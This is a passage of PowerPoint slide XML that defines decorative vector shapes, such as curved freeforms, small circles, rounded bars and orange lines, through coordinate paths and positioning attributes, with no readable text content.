                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066587" y="1359796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024659" y="1377119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2982046" y="1393078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2938772" y="1407645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2894867" y="1420795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2850357" y="1432498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2805269" y="1442730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759630" y="1451461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713468" y="1458666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2666809" y="1464317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619681" y="1468387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2572110" y="1470849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2524124" y="1471676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1471676"/>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8" name="AutoShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="19050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9" name="AutoShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="19050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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="190500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1" name="AutoShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="19050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2" name="AutoShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="2152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3" name="AutoShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2152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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="215265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5" name="AutoShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="2152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6" name="AutoShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="24003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7" name="AutoShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="24003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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="240030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9" name="AutoShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="24003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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="2647950"/>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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33337" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56911" y="48767"/>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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2647950"/>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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33337" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56911" y="48767"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="2647950"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17450" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="48767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17450" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="48767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="2250"/>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3" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="2647950"/>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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33337" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56911" y="48767"/>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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="28479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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="28479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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="2847975"/>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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="28479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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="30956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1143000" y="30956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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="3095625"/>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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="30956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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="33432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1143000" y="33432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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="3343275"/>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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="33432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6" name="Freeform 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="3590925"/>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7" name="Freeform 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="3590925"/>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8" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="3590925"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17450" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17450" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="2250"/>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9" name="Freeform 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="3590925"/>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0" name="Freeform 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5434076"/>
            <a:ext cx="1595755" cy="1424305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1595755" h="1424304">
                <a:moveTo>
                  <a:pt x="0" y="68764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74873" y="44755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119524" y="33095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164835" y="23131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210772" y="14899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257297" y="8434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304375" y="3772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351971" y="949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448128" y="949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495724" y="3772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542803" y="8434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589329" y="14899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635266" y="23131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680579" y="33095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725231" y="44755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="769187" y="58074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="812412" y="73018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854869" y="89551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896523" y="107637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937338" y="127241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977279" y="148326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016309" y="170857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1054393" y="194798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1091495" y="220114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="246768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162612" y="274726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196555" y="303951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1229373" y="334408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261030" y="366062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1291492" y="398875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320722" y="432813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1348684" y="467840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1375343" y="503921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400664" y="541019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1424609" y="579099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447144" y="618125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468233" y="658061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1487840" y="698872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1505930" y="740523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1522466" y="782977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1537413" y="826198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1550736" y="870152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1562398" y="914802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1572364" y="960112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580598" y="1006047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1587064" y="1052572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591727" y="1099650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594551" y="1147246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595501" y="1195324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594551" y="1243402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591727" y="1290998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1587064" y="1338076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580598" y="1384601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1573550" y="1423921"/>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41" name="Freeform 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697382" y="5293105"/>
            <a:ext cx="439420" cy="388620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="439419" h="388620">
                <a:moveTo>
                  <a:pt x="233273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="373849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438924" y="388023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233273"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42" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="5848350"/>
            <a:ext cx="409575" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="409575" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F58830">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="5991225"/>
            <a:ext cx="409575" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="47625">
                <a:moveTo>
                  <a:pt x="385762" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23812" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23812" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409575" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762"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4" name="Freeform 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="6181725"/>
            <a:ext cx="409575" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="409575" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F58830">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="6324600"/>
            <a:ext cx="409575" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="47625">
                <a:moveTo>
                  <a:pt x="385762" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23812" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23812" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409575" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762"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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="6515100"/>
            <a:ext cx="409575" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="409575" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F58830">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="6657975"/>
            <a:ext cx="409575" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="47625">
                <a:moveTo>
                  <a:pt x="385762" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23812" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23812" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409575" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762"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8" name="Freeform 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10839450" y="5362575"/>
            <a:ext cx="1352550" cy="1495425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1352550" h="1495425">
                <a:moveTo>
                  <a:pt x="1262126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1213710" y="914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165756" y="3637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118296" y="8134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1071362" y="14374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024988" y="22322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979206" y="31948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="934048" y="43216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="889548" y="56096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845738" y="70554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="802650" y="86557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760317" y="104072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718773" y="123068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678049" y="143510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638179" y="165366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="599195" y="188603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561129" y="213188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524014" y="239089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487884" y="266273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452771" y="294707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418706" y="324359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385724" y="355194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353856" y="387181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323136" y="420287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293596" y="454479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265269" y="489724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238187" y="525989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212383" y="563242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187890" y="601450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164740" y="640580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142967" y="680598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122602" y="721473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103678" y="763172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86229" y="805661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70287" y="848908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55883" y="892880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43052" y="937545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31826" y="982869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22238" y="1028819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14319" y="1075364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8103" y="1122469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="1170103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906" y="1218489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1266825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="911" y="1315416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="1363546"/>
